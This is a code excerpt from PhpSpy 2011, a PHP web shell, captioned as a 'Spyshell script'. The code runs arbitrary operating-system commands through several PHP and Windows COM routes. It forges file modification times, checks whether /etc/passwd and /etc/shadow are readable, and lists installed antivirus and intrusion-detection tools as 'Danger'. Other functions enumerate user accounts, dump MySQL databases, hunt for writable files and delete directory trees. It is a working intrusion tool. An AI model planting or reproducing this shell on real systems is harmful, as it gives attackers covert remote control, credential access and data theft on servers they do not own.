1366    //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1367    $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
1368    formhead(array('title'=>'Clone folder/file was last modified time'));
1369    makehide('action','file');
1370    makehide('dir',$nowpath);
1371    makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1372    makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
1373    formfooter();
1374    formhead(array('title'=>'Set last modified'));
1375    makehide('action','file');
1376    makehide('dir',$nowpath);
1377    makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1378    p('<p>year:');
1379    makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
1380    p('month:');
1381    makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
1382    p('day:');
1383    makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
1384    p('hour:');
1385    makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
1386    p('minute:');
1387    makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
1388    p('second:');
1389    makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
1390    p('</p>');
1391    formfooter();
1392    goback();
1393 }//end newtime
1394 
1395 elseif ($action == 'shell') {
1396    if (IS_WIN && IS_COM) {
1397        if($program && $parameter) {
1398            $shell= new COM('Shell.Application');
1399            $a = $shell->ShellExecute($program,$parameter);
1400            m('Program run has '.(!$a ? 'success' : 'fail'));
1401        }
1402        !$program && $program = 'c:\windows\system32\cmd.exe';
1403        !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
1404        formhead(array('title'=>'Execute Program'));
1405        makehide('action','shell');
1406        makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
1407        p('<p>');
1408        makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
1409        makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1410        p('</p>');
1411        formfoot();
1412    }
1413    formhead(array('title'=>'Execute Command'));
1414    makehide('action','shell');
1415    if (IS_WIN && IS_COM) {
1416        $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
1417        makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
1418    }
1419    p('<p>');
1420    makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
1421    makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1422    p('</p>');
1423    formfoot();
1424 
1425    if ($command) {
1426        p('<hr width="100%" noshade /><pre>');
1427        if ($execfunc=='wscript' && IS_WIN && IS_COM) {
1428            $wsh = new COM('WScript.shell');
1429            $exec = $wsh->exec('cmd.exe /c '.$command);
1430            $stdout = $exec->StdOut();
1431            $stroutput = $stdout->ReadAll();
1432            echo $stroutput;
1433        } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
1434            $descriptorspec = array(
1435               0 => array('pipe', 'r'),
1436               1 => array('pipe', 'w'),
1437               2 => array('pipe', 'w')
1438            );
1439            $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1440            if (is_resource($process)) {
1441                fwrite($pipes[0], $command."\r\n");
1442                fwrite($pipes[0], "exit\r\n");
1443                fclose($pipes[0]);
1444                while (!feof($pipes[1])) {
1445                    echo fgets($pipes[1], 1024);
1446                }
1447                fclose($pipes[1]);
1448                while (!feof($pipes[2])) {
1449                    echo fgets($pipes[2], 1024);
1450                }
1451                fclose($pipes[2]);
1452                proc_close($process);
1453            }
1454        } else {
1455            echo(execute($command));
1456        }
1457        p('</pre>');
1458    }
1459 }//end shell
1460 
1461 elseif ($action == 'phpenv') {
1462    $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1463    $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1464    !$dis_func && $dis_func = 'No'; 
1465    $info = array(
1466        1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
1467        2 => array('Server Domain',$_SERVER['SERVER_NAME']),
1468        3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
1469        4 => array('Server OS',PHP_OS),
1470        5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
1471        6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
1472        7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
1473        8 => array('PHP run mode',strtoupper(php_sapi_name())),
1474        9 => array('The file path',__FILE__),
1475 
1476        10 => array('PHP Version',PHP_VERSION),
1477        11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
1478        12 => array('Safe Mode',getcfg('safe_mode')),
1479        13 => array('Administrator',$adminmail),
1480        14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
1481        15 => array('enable_dl',getcfg('enable_dl')),
1482        16 => array('display_errors',getcfg('display_errors')),
1483        17 => array('register_globals',getcfg('register_globals')),
1484        18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
1485        19 => array('memory_limit',getcfg('memory_limit')),
1486        20 => array('post_max_size',getcfg('post_max_size')),
1487        21 => array('upload_max_filesize',$upsize),
1488        22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
1489        23 => array('disable_functions',$dis_func),
1490    );
1491 
1492    if($phpvarname) {
1493        m($phpvarname .' : '.getcfg($phpvarname));
1494    }
1495 
1496    formhead(array('title'=>'Server environment'));
1497    makehide('action','phpenv');
1498    makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
1499    formfooter();
1500 
1501    $hp = array(0=> 'Server', 1=> 'PHP');
1502    for($a=0;$a<2;$a++) {
1503        p('<h2>'.$hp[$a].' &raquo;</h2>');
1504        p('<ul class="info">');
1505        if ($a==0) {
1506            for($i=1;$i<=9;$i++) {
1507                p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1508            }
1509        } elseif ($a == 1) {
1510            for($i=10;$i<=23;$i++) {
1511                p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1512            }
1513        }
1514        p('</ul>');
1515    }
1516 }//end phpenv
1517 
1518 elseif ($action == 'secinfo') {
1519    
1520    secparam('Server software', @getenv('SERVER_SOFTWARE'));
1521    secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
1522    secparam('Open base dir', @ini_get('open_basedir'));
1523    secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
1524    secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
1525    secparam('cURL support', function_exists('curl_version')?'enabled':'no');
1526    $temp=array();
1527    if(function_exists('mysql_get_client_info'))
1528        $temp[] = "MySql (".mysql_get_client_info().")";
1529    if(function_exists('mssql_connect'))
1530        $temp[] = "MSSQL";
1531    if(function_exists('pg_connect'))
1532        $temp[] = "PostgreSQL";
1533    if(function_exists('oci_connect'))
1534        $temp[] = "Oracle";
1535    secparam('Supported databases', implode(', ', $temp));
1536    
1537    if( !IS_WIN ) {
1538        $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1539        $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1540        $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1541        secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
1542        secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
1543        secparam('OS version', @file_get_contents('/proc/version'));
1544        secparam('Distr name', @file_get_contents('/etc/issue.net'));
1545        $safe_mode = @ini_get('safe_mode');
1546        if(!$GLOBALS['safe_mode']) {
1547            $temp=array();
1548            foreach ($userful as $item)
1549                if(which($item)){$temp[]=$item;}
1550            secparam('Userful', implode(', ',$temp));
1551            $temp=array();
1552            foreach ($danger as $item)
1553                if(which($item)){$temp[]=$item;}
1554            secparam('Danger', implode(', ',$temp));
1555            $temp=array();
1556            foreach ($downloaders as $item) 
1557                if(which($item)){$temp[]=$item;}
1558            secparam('Downloaders', implode(', ',$temp));
1559            secparam('Hosts', @file_get_contents('/etc/hosts'));
1560            secparam('HDD space', execute('df -h'));
1561            secparam('Mount options', @file_get_contents('/etc/fstab'));
1562        }
1563    } else {
1564        secparam('OS Version',execute('ver'));
1565        secparam('Account Settings',execute('net accounts'));
1566        secparam('User Accounts',execute('net user'));
1567        secparam('IP Configurate',execute('ipconfig -all'));
1568    }
1569 }//end
1570 
1571 else {
1572    m('Undefined Action');
1573 }
1574 
1575 ?>
1576 </td></tr></table>
1577 <div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
1578    <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
1579    Powered by <a title="Build 20110502" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2011</a>. Copyright (C) 2004-2011 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
1580 </div>
1581 </body>
1582 </html>
1583 
1584 <?php
1585 
1586 /*======================================================
1587 º¯Êý¿â
1588 ======================================================*/
1589 
1590 function secparam($n, $v) {
1591    $v = trim($v);
1592    if($v) {
1593        p('<h2>'.$n.' &raquo;</h2>');
1594        p('<div class="infolist">');
1595        if(strpos($v, "\n") === false)
1596            p($v.'<br />');
1597        else
1598            p('<pre>'.$v.'</pre>');
1599        p('</div>');
1600    }
1601 }
1602 function m($msg) {
1603    echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
1604    echo $msg;
1605    echo '</div>';
1606 }
1607 function scookie($key, $value, $life = 0, $prefix = 1) {
1608    global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
1609    $key = ($prefix ? $cookiepre : '').$key;
1610    $life = $life ? $life : $cookielife;
1611    $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1612    setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
1613 }   
1614 function multi($num, $perpage, $curpage, $tablename) {
1615    $multipage = '';
1616    if($num > $perpage) {
1617        $page = 10;
1618        $offset = 5;
1619        $pages = @ceil($num / $perpage);
1620        if($page > $pages) {
1621            $from = 1;
1622            $to = $pages;
1623        } else {
1624            $from = $curpage - $offset;
1625            $to = $curpage + $page - $offset - 1;
1626            if($from < 1) {
1627                $to = $curpage + 1 - $from;
1628                $from = 1;
1629                if(($to - $from) < $page && ($to - $from) < $pages) {
1630                    $to = $page;
1631                }
1632            } elseif($to > $pages) {
1633                $from = $curpage - $pages + $to;
1634                $to = $pages;
1635                if(($to - $from) < $page && ($to - $from) < $pages) {
1636                    $from = $pages - $page + 1;
1637                }
1638            }
1639        }
1640        $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
1641        for($i = $from; $i <= $to; $i++) {
1642            $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
1643        }
1644        $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
1645        $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
1646    }
1647    return $multipage;
1648 }
1649 // µÇ½Èë¿Ú
1650 function loginpage() {
1651 ?>
1652    <style type="text/css">
1653    input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
1654    </style>
1655    <form method="POST" action="">
1656    <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
1657    <input type="hidden" name="action" value="login">
1658    <input type="submit" value="Login">
1659    </form>
1660 <?php
1661    exit;
1662 }//end loginpage()
1663 
1664 function execute($cfe) {
1665    $res = '';
1666    if ($cfe) {
1667        if(function_exists('system')) {
1668            @ob_start();
1669            @system($cfe);
1670            $res = @ob_get_contents();
1671            @ob_end_clean();
1672        } elseif(function_exists('passthru')) {
1673            @ob_start();
1674            @passthru($cfe);
1675            $res = @ob_get_contents();
1676            @ob_end_clean();
1677        } elseif(function_exists('shell_exec')) {
1678            $res = @shell_exec($cfe);
1679        } elseif(function_exists('exec')) {
1680            @exec($cfe,$res);
1681            $res = join("\n",$res);
1682        } elseif(@is_resource($f = @popen($cfe,"r"))) {
1683            $res = '';
1684            while(!@feof($f)) {
1685                $res .= @fread($f,1024); 
1686            }
1687            @pclose($f);
1688        }
1689    }
1690    return $res;
1691 }
1692 function which($pr) {
1693    $path = execute("which $pr");
1694    return ($path ? $path : $pr); 
1695 }
1696 
1697 function cf($fname,$text){
1698    if($fp=@fopen($fname,'w')) {
1699        @fputs($fp,@base64_decode($text));
1700        @fclose($fp);
1701    }
1702 }
1703 function dirsize($dir) { 
1704    $dh = @opendir($dir);
1705    $size = 0;
1706    while($file = @readdir($dh)) {
1707        if ($file != '.' && $file != '..') {
1708            $path = $dir.'/'.$file;
1709            $size += @is_dir($path) ? dirsize($path) : @filesize($path);
1710        }
1711    }
1712    @closedir($dh);
1713    return $size;
1714 }
1715 // Ò³Ãæµ÷ÊÔÐÅÏ¢
1716 function debuginfo() {
1717    global $starttime;
1718    $mtime = explode(' ', microtime());
1719    $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1720    echo 'Processed in '.$totaltime.' second(s)';
1721 }
1722 
1723 //Á¬½ÓMYSQLÊý¾Ý¿â
1724 function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
1725    global $charsetdb;
1726    @ini_set('mysql.connect_timeout', 5);
1727    if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
1728        p('<h2>Can not connect to MySQL server</h2>');
1729        exit;
1730    }
1731    if($link && $dbname) {
1732        if (!@mysql_select_db($dbname, $link)) {
1733            p('<h2>Database selected has error</h2>');
1734            exit;
1735        }
1736    }
1737    if($link && mysql_get_server_info() > '4.1') {
1738        if($charset && in_array(strtolower($charset), $charsetdb)) {
1739            q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1740        }
1741    }
1742    return $link;
1743 }
1744 
1745 // È¥µôתÒå×Ö·û
1746 function s_array(&$array) {
1747    if (is_array($array)) {
1748        foreach ($array as $k => $v) {
1749            $array[$k] = s_array($v);
1750        }
1751    } else if (is_string($array)) {
1752        $array = stripslashes($array);
1753    }
1754    return $array;
1755 }
1756 
1757 // Çå³ýHTML´úÂë
1758 function html_clean($content) {
1759    $content = htmlspecialchars($content);
1760    $content = str_replace("\n", "<br />", $content);
1761    $content = str_replace("  ", "&nbsp;&nbsp;", $content);
1762    $content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
1763    return $content;
1764 }
1765 
1766 // »ñȡȨÏÞ
1767 function getChmod($filepath){
1768    return substr(base_convert(@fileperms($filepath),10,8),-4);
1769 }
1770 
1771 function getPerms($filepath) {
1772    $mode = @fileperms($filepath);
1773    if (($mode & 0xC000) === 0xC000) {$type = 's';}
1774    elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
1775    elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
1776    elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
1777    elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
1778    elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
1779    elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
1780    else {$type = '?';}
1781 
1782    $owner['read'] = ($mode & 00400) ? 'r' : '-'; 
1783    $owner['write'] = ($mode & 00200) ? 'w' : '-'; 
1784    $owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
1785    $group['read'] = ($mode & 00040) ? 'r' : '-'; 
1786    $group['write'] = ($mode & 00020) ? 'w' : '-'; 
1787    $group['execute'] = ($mode & 00010) ? 'x' : '-'; 
1788    $world['read'] = ($mode & 00004) ? 'r' : '-'; 
1789    $world['write'] = ($mode & 00002) ? 'w' : '-'; 
1790    $world['execute'] = ($mode & 00001) ? 'x' : '-'; 
1791 
1792    if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
1793    if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
1794    if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
1795  
1796    return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
1797 }
1798 
1799 function getUser($filepath)   {
1800    if (function_exists('posix_getpwuid')) {
1801        $array = @posix_getpwuid(@fileowner($filepath));
1802        if ($array && is_array($array)) {
1803            return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
1804        }
1805    }
1806    return '';
1807 }
1808 
1809 // ɾ³ýĿ¼
1810 function deltree($deldir) {
1811    $mydir=@dir($deldir);  
1812    while($file=$mydir->read())   {        
1813        if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 
1814            @chmod($deldir.'/'.$file,0777);
1815            deltree($deldir.'/'.$file); 
1816        }
1817        if (is_file($deldir.'/'.$file)) {
1818            @chmod($deldir.'/'.$file,0777);
1819            @unlink($deldir.'/'.$file);
1820        }
1821    } 
1822    $mydir->close(); 
1823    @chmod($deldir,0777);
1824    return @rmdir($deldir) ? 1 : 0;
1825 }
1826 
1827 // ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
1828 function bg() {
1829    global $bgc;
1830    return ($bgc++%2==0) ? 'alt1' : 'alt2';
1831 }
1832 
1833 // »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶
1834 function getPath($scriptpath, $nowpath) {
1835    if ($nowpath == '.') {
1836        $nowpath = $scriptpath;
1837    }
1838    $nowpath = str_replace('\\', '/', $nowpath);
1839    $nowpath = str_replace('//', '/', $nowpath);
1840    if (substr($nowpath, -1) != '/') {
1841        $nowpath = $nowpath.'/';
1842    }
1843    return $nowpath;
1844 }
1845 
1846 // »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼
1847 function getUpPath($nowpath) {
1848    $pathdb = explode('/', $nowpath);
1849    $num = count($pathdb);
1850    if ($num > 2) {
1851        unset($pathdb[$num-1],$pathdb[$num-2]);
1852    }
1853    $uppath = implode('/', $pathdb).'/';
1854    $uppath = str_replace('//', '/', $uppath);
1855    return $uppath;
1856 }
1857 
1858 // ¼ì²éPHPÅäÖòÎÊý
1859 function getcfg($varname) {
1860    $result = get_cfg_var($varname);
1861    if ($result == 0) {
1862        return 'No';
1863    } elseif ($result == 1) {
1864        return 'Yes';
1865    } else {
1866        return $result;
1867    }
1868 }
1869 
1870 // ¼ì²éº¯ÊýÇé¿ö
1871 function getfun($funName) {
1872    return (false !== function_exists($funName)) ? 'Yes' : 'No';
1873 }
1874 
1875 // »ñµÃÎļþÀ©Õ¹Ãû
1876 function getext($file) {
1877    $info = pathinfo($file);
1878    return $info['extension'];
1879 }
1880 
1881 function GetWDirList($dir){
1882    global $dirdata,$j,$nowpath;
1883    !$j && $j=1;
1884    if ($dh = opendir($dir)) {
1885        while ($file = readdir($dh)) {
1886            $f=str_replace('//','/',$dir.'/'.$file);
1887            if($file!='.' && $file!='..' && is_dir($f)){
1888                if (is_writable($f)) {
1889                    $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
1890                    $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1891                    $dirdata[$j]['dirchmod']=getChmod($f);
1892                    $dirdata[$j]['dirperm']=getPerms($f);
1893                    $dirdata[$j]['dirlink']=$dir;
1894                    $dirdata[$j]['server_link']=$f;
1895                    $j++;
1896                }
1897                GetWDirList($f);
1898            }
1899        }
1900        closedir($dh);
1901        clearstatcache();
1902        return $dirdata;
1903    } else {
1904        return array();
1905    }
1906 }
1907 
1908 function GetWFileList($dir){
1909    global $filedata,$j,$nowpath, $writabledb;
1910    !$j && $j=1;
1911    if ($dh = opendir($dir)) {
1912        while ($file = readdir($dh)) {
1913            $ext = getext($file);
1914            $f=str_replace('//','/',$dir.'/'.$file);
1915            if($file!='.' && $file!='..' && is_dir($f)){
1916                GetWFileList($f);
1917            } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
1918                if (is_writable($f)) {
1919                    $filedata[$j]['filename']=str_replace($nowpath,'',$f);
1920                    $filedata[$j]['size']=sizecount(@filesize($f));
1921                    $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1922                    $filedata[$j]['filechmod']=getChmod($f);
1923                    $filedata[$j]['fileperm']=getPerms($f);
1924                    $filedata[$j]['fileowner']=getUser($f);
1925                    $filedata[$j]['dirlink']=$dir;
1926                    $filedata[$j]['server_link']=$f;
1927                    $j++;
1928                }
1929            }
1930        }
1931        closedir($dh);
1932        clearstatcache();
1933        return $filedata;
1934    } else {
1935        return array();
1936    }
1937 }
1938 
1939 function GetSFileList($dir, $content, $re = 0) {
1940    global $filedata,$j,$nowpath, $writabledb;
1941    !$j && $j=1;
1942    if ($dh = opendir($dir)) {
1943        while ($file = readdir($dh)) {
1944            $ext = getext($file);
1945            $f=str_replace('//','/',$dir.'/'.$file);
1946            if($file!='.' && $file!='..' && is_dir($f)){
1947                GetSFileList($f, $content, $re = 0);
1948            } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
1949                $find = 0;
1950                if ($re) {
1951                    if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){
1952                        $find = 1;
1953                    }
1954                } else {
1955                    if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) {
1956                        $find = 1;
1957                    }
1958                }
1959                if ($find) {
1960                    $filedata[$j]['filename']=str_replace($nowpath,'',$f);
1961                    $filedata[$j]['size']=sizecount(@filesize($f));
1962                    $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1963                    $filedata[$j]['filechmod']=getChmod($f);
1964                    $filedata[$j]['fileperm']=getPerms($f);
1965                    $filedata[$j]['fileowner']=getUser($f);
1966                    $filedata[$j]['dirlink']=$dir;
1967                    $filedata[$j]['server_link']=$f;
1968                    $j++;
1969                }
1970            }
1971        }
1972        closedir($dh);
1973        clearstatcache();
1974        return $filedata;
1975    } else {
1976        return array();
1977    }
1978 }
1979 
1980 function qy($sql) { 
1981    global $mysqllink;
1982    //echo $sql.'<br>';
1983    $res = $error = '';
1984    if(!$res = @mysql_query($sql,$mysqllink)) { 
1985        return 0;
1986    } else if(is_resource($res)) {
1987        return 1; 
1988    } else {
1989        return 2;
1990    }    
1991    return 0;
1992 }
1993 
1994 function q($sql) { 
1995    global $mysqllink;
1996    return @mysql_query($sql,$mysqllink);
1997 }
1998 
1999 function fr($qy){
2000    mysql_free_result($qy);
2001 }
2002 
2003 function sizecount($fileSize) {
2004    $size = sprintf("%u", $fileSize);
2005    if($size == 0) {
2006        return '0 Bytes' ;
2007    }
2008    $sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');
2009    return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i];
2010 }
2011 // ±¸·ÝÊý¾Ý¿â
2012 function sqldumptable($table, $fp=0) {
2013    global $mysqllink;
2014 
2015    $tabledump = "DROP TABLE IF EXISTS `$table`;\n";
2016    $res = q("SHOW CREATE TABLE $table");
2017    $create = mysql_fetch_row($res);
2018    $tabledump .= $create[1].";\n\n";
2019 
2020    if ($fp) {
2021        fwrite($fp,$tabledump);
2022    } else {
2023        echo $tabledump;
2024    }
2025    $tabledump = '';
2026    $rows = q("SELECT * FROM $table");
2027    while ($row = mysql_fetch_assoc($rows)) {
2028        foreach($row as $k=>$v) {
2029            $row[$k] = "'".@mysql_real_escape_string($v)."'";
2030        }
2031        $tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n";
2032        if ($fp) {
2033            fwrite($fp,$tabledump);
2034        } else {
2035            echo $tabledump;
2036        }
2037    }
2038    fwrite($fp,"\n\n");
2039    fr($rows);
2040 }
2041 
2042 function p($str){
2043    echo $str."\n";
2044 }
2045 
2046 function tbhead() {
2047    p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2048 }
2049 function tbfoot(){
2050    p('</table>');
2051 }
2052 
2053 function makehide($name,$value=''){
2054    p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2055 }
2056 
2057 function makeinput($arg = array()){
2058   $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2059    $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2060    !$arg['type'] && $arg['type'] = 'text';
2061    $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2062    $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2063    if ($arg['newline']) {
2064        p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2065    } else {
2066        p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2067    }
2068 }
2069 
2070 function makeselect($arg = array()){
2071    if ($arg['onchange']) {
2072        $onchange = 'onchange="'.$arg['onchange'].'"';
2073    }
2074    $arg['title'] = $arg['title'] ? $arg['title'] : '';
2075    if ($arg['newline']) p('<p>');
2076    p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2077        if (is_array($arg['option'])) {
2078            if ($arg['nokey']) {
2079                foreach ($arg['option'] as $value) {
2080                    if ($arg['selected']==$value) {
2081                        p("<option value=\"$value\" selected>$value</option>");
2082                   } else {
2083                       p("<option value=\"$value\">$value</option>");
2084                   }
2085               }
2086           } else {
2087               foreach ($arg['option'] as $key=>$value) {
2088                   if ($arg['selected']==$key) {
2089                       p("<option value=\"$key\" selected>$value</option>");
2090                   } else {
2091                       p("<option value=\"$key\">$value</option>");
2092                   }
2093               }
2094           }
2095       }
2096   p("</select>");
2097   if ($arg['newline']) p('</p>');
2098 }
2099 function formhead($arg = array()) {
2100   global $self;
2101   !$arg['method'] && $arg['method'] = 'post';
2102   !$arg['action'] && $arg['action'] = $self;
2103   $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2104    !$arg['name'] && $arg['name'] = 'form1';
2105    p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2106    if ($arg['title']) {
2107        p('<h2>'.$arg['title'].' &raquo;</h2>');
2108    }
2109 }
2110    
2111 function maketext($arg = array()){
2112    !$arg['cols'] && $arg['cols'] = 100;
2113    !$arg['rows'] && $arg['rows'] = 25;
2114    $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2115    p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2116 }
2117 
2118 function formfooter($name = ''){
2119    !$name && $name = 'submit';
2120    p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
2121    p('</form>');
2122 }
2123 
2124 function goback(){
2125    global $self, $nowpath;
2126    p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
2127 }
2128 
2129 function formfoot(){
2130    p('</form>');
2131 }
2132 
2133 function encode_pass($pass) {
2134    $pass = md5('angel'.$pass);
2135    $pass = md5($pass.'angel');
2136    $pass = md5('angel'.$pass.'angel');
2137    return $pass;
2138 }
2139 
2140 function pr($s){
2141    echo "<pre>".print_r($s).'</pre>';
2142 }
2143 
2144 ?>

Spyshell Script screenshot

Spyshell script screenshot

Spyshell script screenshot